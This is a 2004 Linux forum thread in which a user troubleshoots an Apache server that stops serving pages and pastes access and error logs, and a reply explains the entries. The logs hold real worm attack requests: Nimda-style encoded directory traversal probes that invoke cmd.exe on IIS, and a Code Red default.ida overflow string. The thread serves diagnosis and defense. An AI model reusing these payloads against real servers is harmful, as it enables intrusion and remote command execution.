Find the answer to your Linux question:
Results 1 to 2 of 2
Hello I hope you can help me, it's been two weeks now and I can't get an answer any where. I'm using Mandrake 9.2. This is the out put from ...
Enjoy an ad free experience by logging in. Not a member yet? Register.
  1. #1
    Just Joined!
    Join Date
    Sep 2003
    Location
    Los Angeles, California
    Posts
    13

    Apache stops serving pages....


    Hello I hope you can help me, it's been two weeks now and I can't get an answer any where.

    I'm using Mandrake 9.2.
    This is the out put from "apachectl extendedstatus"
    Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6.3.92mdk) mod_fortress/1.0 mod_ssl/2.0.47 OpenSSL/0.9.7b PHP/4.3.2

    The server works fine for a while(any where from twenty minutes to six hours), then it stops serving pages. The logs seem to still be working so does Apache but the pages just won't show up on the browser. Under access_log it shows every time I try to log on as [192.168.1.1 - - [31/Mar/2004:15:37:47 -0800] "GET / HTTP/1.1" 200 7209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)"] which leads me to believe the server thinks it went through. If I try to load the page again the log shows the same entry again.


    Here are some suspicious log entries.

    access_log:
    127.0.0.1 - - [29/Mar/2004:13:01:34 -0800] "GET /server-status HTTP/1.0" 200 1914 "-" "Lynx/2.8.5dev.12 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7b"

    ##This I assume are attempts at hacking windows servers.
    ##Sows up at least eight times.
    68.204.239.13 - - [29/Mar/2004:14:10:08 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 399 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:10 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 397 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:10 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 407 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:11 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 407 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:12 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 421 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:10:16 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:11:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:13:17 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 454 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:14:47 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:16:18 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:04 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:07 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 420 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:11 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 411 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:11 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 411 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 421 "-" "-"
    68.204.239.13 - - [29/Mar/2004:14:17:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 421 "-" "-"

    ##This also shows up several times
    68.40.15.102 - - [29/Mar/2004:16:15:40 -0800] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%u cbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb d3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b %u53ff%u0078%u0000%u00=a HTTP/1.0" 404 394 "-" "-"

    82.48.245.88 - - [29/Mar/2004:19:26:53 -0800] "GET http://dc.tickerbar.net:42857/tld/pxy.m?nc=145295770 HTTP/1.0" 404 392 "-" "-"

    localhost - - [31/Mar/2004:15:59:34 -0800] "GET /server-status HTTP/1.0" 200 1937 "-" "Lynx/2.8.5dev.12 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.7b"




    error_log:
    ##This is repeated all throughout the log, over and over.
    [Sun Mar 28 17:42:56 2004] [notice] Digest: generating secret for digest authentication ...
    [Sun Mar 28 17:42:56 2004] [notice] Digest: done
    [Sun Mar 28 17:42:56 2004] [notice] Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6.3.92mdk) mod_fortress/1.0 mod_ssl/2.0.47 OpenSSL/0.9.7b PHP/4.3.2 configured -- resuming normal operations
    [Sun Mar 28 17:48:38 2004] [notice] caught SIGTERM, shutting down
    [Sun Mar 28 17:48:39 2004] [notice] Digest: generating secret for digest authentication ...
    [Sun Mar 28 17:48:39 2004] [notice] Digest: done
    [Sun Mar 28 17:48:39 2004] [notice] Apache-AdvancedExtranetServer/2.0.47 (Mandrake Linux/6.3.92mdk) mod_fortress/1.0 mod_ssl/2.0.47 OpenSSL/0.9.7b PHP/4.3.2 configured -- resuming normal operations
    [Sun Mar 28 17:49:06 2004] [notice] caught SIGTERM, shutting down
    [Sun Mar 28 17:51:38 2004] [notice] Digest: generating secret for digest authentication ...
    [Sun Mar 28 17:51:38 2004] [notice] Digest: done

    [Sun Mar 28 23:45:00 2004] [error] [client 196.40.37.190] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /

    ///////////////////////////////////////////////////////////

    That's most of what I can see that does not seem right.
    Please any lead would help. I'm close to just dumping the whole thing. Might change distributions and start from scratch.

  2. #2
    flw
    flw is offline
    Linux Engineer
    Join Date
    Mar 2003
    Location
    U.S.A.
    Posts
    1,025
    Your first log section on incoming connection attemps (GET /scripts/root.exe?/) appear to be nimba form another server on the net look for a place to plant a seed. Another (GET /default.ida?) is code red from another server like nimba looking for the future on your machine.

    Since your on linux the above is just a minor bandwidth issue and not your root cause.

    The following page contains possible causes and solutions as well as references to more info at http://lists.debian.org/debian-user/.../msg02247.html
    Dan

    \"Keep your friends close and your enemies even closer\" from The Art of War by Sun Tzu\"

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •